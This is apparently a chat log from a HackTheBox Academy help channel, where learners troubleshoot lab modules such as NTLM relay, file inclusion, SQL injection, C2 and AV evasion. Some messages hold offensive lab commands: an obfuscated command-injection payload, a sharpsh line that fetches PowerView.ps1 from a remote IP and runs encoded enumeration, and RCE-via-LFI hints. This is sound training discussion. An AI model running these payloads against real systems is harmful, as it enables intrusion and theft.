Nope... I went through the history and used the --show, but nothing...

If you didn't crack it show won't show it. To view the cracked password associated with that hash type you would need to include the format, like this for example:

└─$ john --format=ripemd-128 ripe.hash --show                                     
REDACTED

1 password hash cracked, 0 left```

You could always look at the content of the `john.pot` file if you wanted to look at all of the hashes cracked by JTR.

ILY

Thanks man!

Looking at your screenshot, I also recommend changing the transparency in your terminal settings to zero, so you cannot see things behind it. IMO it makes for better screenshots in a report.

I'll do that, thank you!

If I recall correctly, the dev machine should stay up until you spin up a different machine in a different section. So if you intend to use only the machines provided and work through the material in order, you'll have to switch back and forth between sections to work on the dev machine, then your current target, then back to section 1 to spin up the dev again, and so on as you progress through the module.

There are many other modules which allow you to launch multiple machines from one section so you can seemlessly hop between multiple hosts as you work, which is very convenient, but this isn't how the Windows Evasion module is set up unfortunately.

Antivirus
[10/03/2025 10:21:06] Checking...
[10/03/2025 10:21:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
[10/03/2025 10:22:06] Checking...
[10/03/2025 10:22:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
[10/03/2025 10:23:06] Checking...
[10/03/2025 10:23:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus

Microsoft Defender can't detect it, but flag.txt is not being created.

Normaly u get a message from airodump-ng if u catched a handshake. Did u got something?

As an alternative u can also try to use hcxdumptool instead of airodump-ng and and aireplay-ng

Issues with NTLM Relay Attacks assessment, I have created a fake computer and am running the relay for ADCS, and when I run the printerbug.py. It keeps telling me that the object doesn’t exist?

Thats a good point. I did not get a message saying that I caught a handshake.
I'll retry the challange using hcxdumotool as well. Thank you!

Cool, I hope it helped you. I didn't studied the module myself, but I have worked with the airckrack and hcx frameworks a bit. hcxdumptool in particular is much smarter and more modern than the aircrack framework,
although it is a little more difficult to use. If you have any further questions, please feel free to ask.

Also Feel free to post the prompt you use to deauthenticate the BSSID.

module Web Fuzzing section Virtual Host and Subdomain Fuzzing
on gobuster subdomain fuzzing, parameter for dns is -do and not -d

Yes, that is the parameter for image.php. Regardless, you are right on the contact.php's 'region' parameter, that is in fact vulnerable to LFI, and from which you can trigger an uploaded shell by appending the desired command. I have done this process, and I got the " 'region' parameter contains invalid character(s) ", and after retrying it a couple times, I ended up looking at the solution, to really see if I was doing something wrong, but I did it exactly as it is contemplated. I am starting to think that there is something messed up within the skill assessment, otherwise if someone knows what could be happening, we would appreciate some help!

I'm blocked in the SQL Injection Fundamentals -Skill assessment and I see I'm not the only one.. If anybody could be a bit more precise and give some help it would be highly appreciated (tried all the payloads, used the repeater in burp, etc... but I just can't bypass the login..)

No word of a lie, I must've been hitting away at this Skills Assessment Part II for days now.

I'm completely stuck on question 8 (Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host) of this module: https://academy.hackthebox.com/module/143/section/1279

Can anyone give a hint as to how to proceed?

You can DM.

https://academy.hackthebox.com/module/249/section/2820
Guys, please did someone resolve this with Frida 17.3.1 ?

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

Hi everyone,
I'm still stuck with the Web Fuzzing - skills assessment, can't figure what I'm doing bad since 2 days now.
I found some endpoint but nothing relevant.
If someone nice can help me, I will be grateful.

Hi guys, I'm currently working on the HTB File Inclusion Skill-Assasement and could really use a hint. I've been going in circles for days now.

we all do haha

what exactly do u mean by "looking at the solution" bro?

I would have a hint for the first step LFI

would appreciate if u tell me this

DM me

This has nothing to do with HTB Academy modules.

I'm stuck on Pass the Certificate in the Password Attacks module.
I can't complete Question 2 — "What are the contents of flag.txt on Administrator's desktop?" because printerbug.py fails to obtain the .pfx, so I can't move forward. What should I do?

Hello, is this the right place to talk about pro-labs?

No, #1263635449335910531 would be the place. You'll have to follow the instructions in #welcome to get access.

Same here! Unable to progress on this one. Have tried a similar approach and a few other things but had no luck. A useful hint would be greatly appreciated. Used the cheatsheet but no luck.

Always the way as soon as you ask for help - I've made progress. DM for tip if you need.

Yes men software creppy

Tell girl not play

Men all date girl

Andress number aphone ip all

@idle shuttle you're talking gibberish. also this channel is for talk about modules. Follow the instructions in #welcome to gain access to other channels.

Thanks

I'm a beginner with basic Python skills and want to start participating in Capture The Flag (CTF) challenges. Could you guide me on how to start from scratch and improve my skills to participate in these events?
Reply please

This is the HackTheBox server. Maybe ask in the THM server.

Ok ya sorry with respect to htb only m asking

Hello guys I am doing Attacking AI - Application and System module and on the Model Deployment Tampering section. The question is:

Exploit the ShellTorch vulnerability to obtain the flag.

I have done the steps required to get a rev shell but it's still not working is it possible if I can DM someone to help me because I don't know what I'm doing wrong because my payload is the exact same as the walkthroughs

hey guys im stuck big time. Im doing the "Pass the ticket from Windows" lab but im stuck on the question "Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john" found the file but it keeps saying Access is Denied. I need help big time please:(

literally copied and pasted the walkthrough and it doesn't work???

omfg bro i just figured it out

lol

for the ACL Abuse section of AD Enumeration and Attacks module there's only one question. my issue is I am trying to add the user it tells me to add and it is saying I am entering the wrong username or password. Can someone help me out?

I need to add a user to a group to bypass the permissions of the network.

anyone able to DM?

Howdy!!! i need some help. I'm working on skilss assessment on network foundations Chapter 3 : Target Acquired. After login on first terminal to use ftp after Passive mode entered and obtaining the ports for the calculation, whenever i open the 2nd terminal and try to netcat to the data channel i got message connection refused

i figured it out, was getting timeout because i was too slow :p

Anyoen able to help with **nosql injection skills assessment II **?

I think you should be able to adjust the timeout for ftp

anyone else getting a 429 too many requests error on htb academy forum website...

They're sunsetting the forums.

Hi guys

in this link I think theres a mistake

https://academy.hackthebox.com/module/148/section/1364

it literally contradicts itself

can someone explain if Im trippin or if the actual answer is True or if theres something up with the module, please

Read the second activity on the question and the actual line again...

@mighty matrix Please take care to not post answers

ahhh just re read it, sorry for something so silly 😂 Its almost 6 am here and quite tired

In Pivoting, tunneling and port forwarding section Socat Redirection with a Reverse Shell, why is a Windows payload being created if the web server is ubuntu?

oh nvm the server is a pivot point, didnt see that part

anyone?

There's an easier way to do it.

@dull solar I know it's technically in a module but please don't spoil the method. Some people want to do it blind

And yes there is an easier way to do it than what the module shows

Alr mb.

Hey did you resolve this? I'm having the same problem

@devout lily please try not to spoil skill assessments.

sudo su

then try again

it works, how can i get back to normal user?

exit

@hardy vessel Nope read the #rules we do not condone illegal activity.

Is hackthebox academy learning style hands-on or just text based ?

Same problem

With the text, you will learn the technique, which you can then apply in the labs

So i cant just stick with htb academy? Do i need htb labs subscription

All you need to learn is the Academy

hey guys why i can't mark certian module complete? there's no option for me to mark complete tho? i am left iwht like 18/19 progreess

Halo

Hello,
I'm having a problem with the "Attacking Email Services" module.
I can't start the target.

What should I do?

Is there a problem with HTB Academy? The target IP address isn’t showing up.

Yes

Those wondering how to do file inclusion room, you should get rce with contact.php file i think this is enough hint. BTW another hint is that to get correct hashed name of the file that you are uploading host that application php file on your machine and get the full name of file that you would have been uploaded to htb machine

hmm

I had to change VPNs to be able to finish the module.

In the Academy room, the IP doesn’t appear for me, so I don’t even have that chance 🙁

Change the VPN server

It says all your progress will be lost. No need for that, I’ll just wait.

i cant complete the vhost module tho

no button for me to complete , i am stuck at 18/19 , like i want full progress completion on it

You might need to contact Support via the website

hi guys

who's have than 3 month on the world of hacker

I dare say that most people here have been studying for more than three months.

Well, I'm new to the hacking world and this week I've been learning the basics of networking and how it works and a little bit of how to program in Python.

hello can anyone help me with academy Command Injections Advanced Command Obfuscation

• 2 Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
  here is the command i am doing
  127.0.0.1%0a%09$(rev<<<'dnif')%09${PATH:0:1}%09$(rev<<<'rsu')%09${PATH:0:1}$(rev<<<'erahs')%09%257C%09$(rev<<<'perg')%09$(rev<<<'toor')%09%257C%09$(rev<<<'perg')%09$(rev<<<'lqysm')%257C%09$(rev<<<'liat')%09$(rev<<<'n-')%091

Windows Evasion Module.

I have placed the perfectly fine working loader in C:\Alpha\Static\ and funny enough I can't get flag.txt generated while log.txt yields I'm back and malware works.

@dense ferry Hi.

Are the module targets having a time out for anyone else too ? I can't seem to get any to start up

Hey, am I the only not able to spawn any target system ?

same

Well, I guess, this answers my question X)

Aight cool

Helo

Why only this channel i can post in 🤔

Hello, I have a problem with spawning a target system in The Intro to Network Analysis: Guided Lab: Traffic Analysis Workflow. Yesterday, it was working quite fine but today, clicking to spawn the target system doesnt generate any IP address. Any help would be appreciated. Thank you!

Same here, can't spawn Windows privesc machines

oh, so its a widespread problem

Not sure but might be

My advice for now : Keep taking notes on the next chapter until resolved

i guess it is!

ok, thanks! will do

I've already raised a ticket just in case but Idk if they get read During the weekend

Ye me too on windows priv esc modules

Hi, is there an issue with skill assessment for pivoting and tunneling lab? When i click to spawn the target system it loads then nothing

same

same

Can always check the status page:
https://status.hackthebox.com/

Didn't know existed🥀

HTB Academy

Operational

It shows up, but the target isn’t working.

Well that's the platform. It does mention a systems minor outage and an issue with VPN.

Might be what is impacting you all.

You're right.

I can check a lab/SA on my end, just give me one that wasn't working that is in CPTS or CAPE path.

I saw Win Priv Esc, so lemme just try one of them.

So VPN connected on my end and Windows Priv Esc - Server Admins section lab launched and I was able to connect via RDP as per the lab instructions.

Can you please Try https://academy.hackthebox.com/module/67/section/630 I'm extremely curious now

Sure

This did spin up for me and I was able to connect via RDP. I am currently using US Academy3 for my VPN connection.

Maybe an EU thing then

Hi guys, is anyone also facing issues with the target not spawing ?

Could be

the US ones work. I was on EU while facing the spawning problem then switched to US.

Yup just confirmed it on my end after switching to an EU VPN and the target did not spawn. So if you are currently on EU it is recommended to roll to a US connection until it is fixed.

Thanks for the info.

Hello im having trouble with the final assignment of llm output attack under red team Ai. If anyone can help me, been stuck on it for days now.

how do you switch ?

hella annoying

You get sorted out?

no idk how to switch servers

Are there any problems with the target servers? I tried spawning them whole day but they're just stuck at "Target(s) are spawning..."

If using EU try switching to US. There appears to be an issue with EU assets.

Sorry its the target and not the pwnbox

Yeah same comment applies to targets. Scroll up a little and you can see what was identified a little earlier.

A friend of mine that lives in belgium is having the same issue, but i tried and it spawned. I also live in europe

guys sorry for asking here but does anyone has issues with the htb machines like i cant spawn a retired machine

same

so im not the only one good to know 😄

i though because i just bought the vip + for the labs

ahaha can you imagine!

But yeah, seems like a lot of people are having this issue. Has anyone from HTB said anything ?

dont know anything

i was playing without the subscription and everything was fine the moment i bought i got this issues

could be that yall have some other machine spawned already ? apparently you have to terminate one before spawning another

probably server issues.. too many people having the same problem

checked it i didnt have any other machine tried this

yea hope they fix it soon

have you tried the labs or the academy ? Try both see if there's any difference. in the academy i can spawn machines

in the academy i dont have issues only with the labs i tried switching vpns there is also this help for trouble with the connections tried some steps but nothing worked

I find the whole website is kind of sluggish no? No clue bro, sorry

its allright bro thanks anyway

yea it really is sluggish tbh

https://status.hackthebox.com/

thanks

Ive heard they are doing a merge ? is that true ?

i dont know

seems like it, but they the one acquiring not the ones being acquired, so thats cool

Hello, I'm doing the Pass the Ticket (PtT) from Linux section in the Password Attacks module. I'm at the part where it's talking about "Using Linux attack tools with Kerberos" and it goes over using Chisel & Proxychains. I understand everything besides one part.

TL;DR are chisel & proxychains being used together or are they separate methods?

It says we need to configure proxychains to use socks5 & port 1080, which is used later with evil-winrm. I got that part, but my confusion is with chisel in this section. We setup a chisel server on our attack host and it uses port 8080 by default. Then we have MS01 connect to us as a chisel client.

What's the purpose of using chisel in this section? Are we using a combination of chisel & proxychains? Because I don't see proxychains or any other tool using port 8080 to utilize our chisel connection. Or is the section showing us 2 methods (proxychains OR chisel) of accomplishing this attack?

so anyone solved SQLi latest assessment so far?

Hello, in the Introduction to network, do I need to memorize all the protocols in common protocols and networking key terminology sections ?

is there anyone who can ask help for sliver C2 module, in particular Kerberos Delegation & Enumeration section

I cant spawn psexec shell to run .\Rubeus.exe monitor /interval:5 /nowrap

im trying to do unconstrained delegation attack but im afraid im missing the question point Submit the Administrator's NT hash

its good to be able to recognize them, the more you look them up, the easier you will remember them

What’s the important protocols to memorize for now

http https sql ftp

sql is a protocol??

it has a port

1 moment

hello, i have a problem on sliver C2 module, trying to do execute-assembly /home/kali/.sliver-client/aliases/sharpview/SharpView.exe "Get-NetUser -PreauthNotRequired" -t 240 -i -E -M but it shown an error everytime .. or this command sharpsh -- '-u http://10.10.15.159:80/PowerView.ps1 -e -c Z2V0LW5ldHVzZXIgfCBzZWxlY3QgIHNhbWFjY291bnRuYW1lLGRlc2NyaXB0aW9u'

i thought i had a output pasted somewhere brb

maybe im misrembering, but ysterday was doing lab or machine and had this port i coud use

but sql is not a protocol sor, it has a port

ok damn sorry man im tired i msread ur question

so http https FTP is the important ones

tcp and udp

no, sql is a querying language. used to manage databases

implant timeout is sometimes normal. try to output in a file.

I would like to see more info.

So should I memorize HTTP HTTPS FTP UDP TCP for now ?

Because there’s a lot of protocols

1433 Yes Microsoft SQL Server database management system (MSSQL) server
1434 Yes Microsoft SQL Server database management system (MSSQL) monitor

also has port

it create a file netusers.txt
get-netuser | select samaccountname,description | out-file C:\Windows\Temp\netusers.txt

but still same error
sharpsh -- '-u http://10.10.15.159:80/PowerView.ps1 -e -c Z2V0LW5ldHVzZXIgfCBzZWxlY3Qgc2FtYWNjb3VudG5hbWUsZGVzY3JpcHRpb24gfCBPdXQtRmlsZSAtRmlsZXBhdGggQzpcV2luZG93c1xUZW1wXG5ldHVzZXJzLnR4dA=='

yeah, there's a looot of them, memorizing them all might take a while. Focus on a few common. TCP, IP, UDP, HTTP/HTTPS, SMB, FTP, SSH.. dont worry about memorizing them all, youll google a lot of it

does it put the content in netusers.txt?

Okay so just these 8

oh my bad, I didn't see the size of file.

nah 0KB no content

Microsoft SQL server. meaning a database.
as a sql db, you have MySQL, postgres, sqlite, and whatnot

u have multiple sql ports

it was more explaininmg what i meant

honestly, these are fine to know by heart. you'll learn as you go, repetition will make the difference as well, the more you do, the more you internalize the knowledge

Get another shell from different beacon.

the pings are too damn high today

tried 3beacons i have restart the vpn 😄 i tried everything... doing it manually using 'shell' it works ..

very weird.

Windows Attacks & Defense module
where am supposed to find the wordlist rockyou.txt?

the hint says ```Use the SecLists/Passwords/Leaked-Databases/rockyou.txt password list

but there is no such thing in my kali attack box

also when i try to ssh kali@targetip it says connection refused

https://academy.hackthebox.com/module/176/section/1778

Hi guys

NTLM Relay Attacks skills assessment: I was able to compromise BACKUP01$ but I am unsure how to proceed next to compromise DC01. I also cannot get the password of the sqlftp user also. Any help is greatly appreciated! Thanks!

Kali has it zipped by default, try locate -i rockyou to find the zip. Or you can just download it. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz

ty

hello guys im stuck at the new file inclusion skill assessment any hints would be appreciated

I have found two parameters p= and region= I suspect the p= is the one but nothing works i have tried fuzzing for lfi payloads none seems to work

Hi, is there anyone I can dm about LLM Output Attacks Skills Assessment ?

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

Hi everyone I need help with the llm data attack output final assignment. Ive been stuck on getting the flag for days. If anyone can offer some guidance I would appreciate it. Thank you.

@terse sedge i believe you need to download the printerbug.py on your on kali laptop and run it from that machinen not attack box, i believe that worked for me

can someone help me? im stuck on session hijacking for cross site scripting. my php code works, and i validated the payload to use, but im not getting the admin cookie

@median kettle I'm doing this from my own kali VM. Haven't tried it on attack box.

@terse sedge i assume you downloaded printerbug.py from github yeah?

@honest cave No. Read the #rules. We do not condone illegal activity.

I have it on my kali VM. I don't recall where I got it from.

@terse sedge sorry, im having to hunt down my notes somewhere, gimme a sec

@terse sedge 1. is the dc's ip in your etc/host file? 2. remove printerbug and download it from github (just to make sure). these are what my notes are telling me

guys in
Information Gathering - Web Edition - Skills Assessment

after execuring python ReconSpider.py http://inlanefreight.htb:48743/

the results is:
cat results.json
{
"emails": [],
"links": [],
"external_files": [],
"js_files": [],
"form_fields": [],
"images": [],
"videos": [],
"audio": [],
"comments": []
}%

and cant complete the tasks, any help

Why i can't talk in general

You didn't follow the instructions in #welcome

@obsidian pawn Change your profile text please

We do not condone illegal activity

Where is the illegal activity in it?

Don't play stupid, this is your only warning

Ahh

Done

Now i want to talk in general

Then follow the instructions in #welcome

I follow it

Sorry

I don't see it

You have to link your HTB account by following the instructions outlined in the post in #welcome.

disregard i figured out my proble, haha

I tried deleting printerbug.py and downloading a new one. Now I get File "/usr/lib/python3/dist-packages/nxc/modules/printerbug.py", line 120
<title>krbrelayx/printerbug.py at master · dirkjanm/krbrelayx · GitHub</title>
^
SyntaxError: invalid character '·' (U+00B7)

You probably didn't download the raw file and instead downloaded the github page that contained the file

Because your error message has html tags in it

I did this: sudo wget https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

visit that page

you can see it's not raw python, it's a html page

you want this https://raw.githubusercontent.com/dirkjanm/krbrelayx/refs/heads/master/printerbug.py

click the "raw" or "download" button to get it on your link

also no need to sudo to wget

Looks like that worked. I still had to use sudo. I kept getting access denied messages.

Hi guys, got a question

After installing the Parrot OS I can't find the tools list like shown in the picture

Which tool list are you looking for, and which image are you referring to?

https://academy.hackthebox.com/module/87/section/882

The tools list they reffer in the middle of the page:
tools.list
after upgrading and updating the system

most of the tools are installed but are to be found on usr/bin

This is a list created by the author. It is not included in the system.

need help with C2 operations with sliver module 🙁

I am stuck at task 7. any one who can help me get rid of from here, please?
https://app.hackthebox.com/sherlocks/Payload

Kerberos Delegation & Enumeration section, I dont understand what I need to do, if I need to exploit uncostrained delegation, psexec doesnt work to use rubeus monitor command

You might get more help in the #sherlocks channel.

I think you should be able to follow along with the section material. You can DM what you have setup and what you are trying.

@gray yacht thx

I'm having a lot of issues with the Introduction to Digital Forensics module. I'm trying to do the exercise in the Evidence Acquisition Techniques & Tools section.

I need to connect to an IP address through RDP. This is the first step of the exercise. My VPN is switched on and my first command is a ping to the IP. The ping is successful.
Then I write: "xfreerdp3 /u:Administrator /v:IP-Adress"
It will prompt me to give a password, which I give. A new window opens and I log in, but a few seconds after getting access, it completely crashes. The window disappears and the instance dies (can't be pinged anymore)
I have tried this 3 times already and I can't get it to work. What's the issue here? I can't solve it on my side it seems. Is the remote instance broken?

In Password Attacks - Pass the Certificate, when running impacket-ntlmrelayx, I get the following errors:

Exception in thread Thread-6: Traceback (most recent call last): File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner self.run() ~~~~~~~~^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run ADCSAttack._run(self) ~~~~~~~~~~~~~~~^^^^^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run certificate_store = self.generate_pfx(key, certificate) File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx p12 = crypto.PKCS12() ^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__ obj = getattr(self._module, attr) AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12

What could this mean?

Quick Google search of AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12:
https://github.com/fortra/impacket/issues/1716

You can try switching VPN protocols and regions to see if that fixes things on your end.

any help on the machine DarkZero would be appreciated, any small hint : )

Best to ask in #1424092683793727589. You'll need to follow the instructions in #welcome to get access to the channel.

@crimson moon Please do not reveal contents of modules above tier 0, especially attack paths in skill assessments. you were on the right track.

Sorry about that how do I obfuscate info? I’m noob in discord

Just say what you're stuck on, module, section, question. If you feel like you need to reveal more detail you can take it to DM, but remember anyone who has done it doesn't need details because they know the way to do it already.

Ok gotcha

Hello everyone can someone confirm whether the sql injection fundamental assessment is working fine and solviable trying for 2 still no clue

It works

Can someone proivide a hint for solving this sql injcetion fundamental assesement.

hello can anyone kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this

it's quite frustrating that I could not get to the machine using smbclient. Is there anything wrong with the server or what did I do wrong?

well the error says it's timing out. is this the pwnbox, or your own vm? are you running the pwnbox and a vm at the same time?

this is htb's pwnbox.

and no, Im not running my vm at the same time

hey everyone

is there any one would like to join me playing pro labs?

I've been struggling with this one too. Help would be appreciated

Can someone help a girl out

Prolabs aren't multiplayer. Also #1263635449335910531, follow the instructions in #welcome to get access to most of the server.

Just ask your question, make sure to state which module section and question you're on.

Hey Everyone I need help_!
any quick way to validate passive subdomains at scale (50–200 domains) without making noise? Just need 2–3 real commands you trust for clean validation before scanning.

Best to say which module, section, and question you're on.

May I DM you?

Hb

Hry

Hey

Sure!

Hey guys, I need help:
Module: Pivoting, Tunneling, Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP

Problem: I transferred the SocksOverRDP-x64.zip to the Windows pivot host and then unzipped it and tried to do the regsvr32.exe SocksOverRDP-Plugin.dll command but kept getting this error. This didn't happen in the example so wondering where I went wrong

Any advice?

disable real time protection

Where u at right now

In sql injection fundamental skill assessment I was able to bypass register page and able to logged in but after login there is only one request I found vulnerable to sql injection that too is not actual sql injection parameter by which I can get info because that is time based sql injection so if anyone has any hint let me know

Hello HTB,

My subscription is expiring soon and I don't plan to renew for now.
I have some modules that I started and haven't completed yet. Do I lose access to them when my subscription ends ?
Thx !

You only keep modules you completed

okay

thx !

I cant even create new account getting error like invalid validation code

Try to bypass it via sql

@fathom pendant can you kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this

May I ?

yes please , can i DM ? my command on recursive fuzzing is running for few hours i want a clarification on it , Thank you

Sure

Nope, it's still not working

Hey everyone 👋 I’m currently working on the XSS module, but I’m a bit stuck — when I try <script>alert(document.cookie)</script>, nothing pops up (no alert). Anyone know what I might be missing?

Huhu, Footprinting was fun. I have a little Problem i cant complete Footprinting/ MySql. I Have the right answer and it is Green but i cant Mark Complete :). Had anyone this Problem ?

DM'd you check it

Is it dom based?

Yes, it is

Do hard refresh

Ctrl+shft+r

You can open a support ticket to report your issues. I haven't worked through that module/section, so I don't know if there is something else going on that you could do on your end.

I have tried to do hard refresh but still nothing. Can it be related to modern browser ?

I don’t think so but still try with burp inbuild chromium it may work

Thanks a lot, it’s worked.

This is not that type of server.

Oh

hello guys Im doing the new sql injection fundamentals skill assessment i managed to bypass the login page via reusing the invitation code and im stuck now any help?

Hello guys do you think HTB Academy content is enough to got the cpts certification (for a beginner) ??

#cpts and doing only modules is not enough, you need to practice.

You should start with CJCA to have a good start and then do CWES or CPTS.

Yes, but you'll need to have a sharp methodology to pass.
I'd say do some prolabs before going into the exam.
You can see the related one's to CPTS from the Academy x HTB Labs section.

and also machines

Ok i think i need to finish the cjca modules before cpts

Is anyone's spawning VM interacting function doesn't work? I'm getting This site can’t be reached Check if there is a typo in vnc.htb-cloud.com

Hi folks, I'm not a java expert but I can tell when I'm doing something wrong - in the 3-tier Thick Application stage of Attacking Common Applications, I'm following the instructions on the page. When I rebuild the "traverse.jar" file, it appears a much smaller size than the original file(s) and does nothing when I run it. I've gone wrong somewhere and it feels like a java knowledge gap rather than anything else - any suggestions?

I need some help with AEN. My bloodhound is not showing the same thing that is in the walkthrough despite trying multiple different ingestion methods.

Well, the versions of BloodHound have probably changed in the meantime too.

Information Gathering - Web Edition - dig
Hi everyone, i dont see the message "Spawn the target" in the exercise section, why?

This is what i am seeing

Hello, I'm not sure to understand this note from the Pass the Ticket from Windows section in the Password Attack module:

Note: At the time of writing, using Mimikatz version 2.2.0 20220919, if we run sekurlsa::ekeys it presents all hashes as des_cbc_md4 on some Windows 10 versions. Exported tickets (sekurlsa::tickets /export) do not work correctly due to the wrong encryption. It is possible to use these hashes to generate new tickets or use Rubeus to export tickets in Base64 format.

Can someone explain me ?

You don't need to spawn target. The domain is available on the Internet Network.

Hey can someone help me with the lolbins module I'm windows evasion path I've been trying to get a shell and all for so long but Nthg is working

Need help with Documentation & Reporting Practice Lab

Everytime i try to import into bloodhound I get a failure. Ive tried multiple times to retreive the data and even spun up a new Kali box to see if that could be the error.

Did you use the right ingestor? It must match the BloodHound version.

its the one that was preinstalled with the lab that was spun up

This version is probably not compatible with your BloodHound.

alright. so I need to investigate how to either update the lab or downgrade bloodhound

If you use BloodHound CE, you can download the correct ingestor directly in BloodHound.

ok, so I will need to install that into the provided vm?

I hate bloodhound lol

Do you work with PwnBox? No idea what's preinstalled here.

no ive been running my own kali box in preperation of the CPTS

if you recommend to use the pwnbox, I will use it. this is the last question for the enter path

No, I do not recommend the PWN Box.
If you use Kali, install the latest version of BloodHound CE and then download the correct ingestor from there, or use NetWxec.

thanks. I will see what I can figure out. been working on this seemingly simple question for a week now. never considered the difference in verisons

now when I put the new bloodhound files as a zip on the desktop of the attack box I loose rdp and cant reconnect....

The walkthrough shows a certain attack that is possible but mine does not.
Any recommendations?

yea this is getting very frusterating, resetting the box for the 3rd time today

just reset everything again and lost connection without doing anything....

Which version are you using, and which version was used in the walkthrough?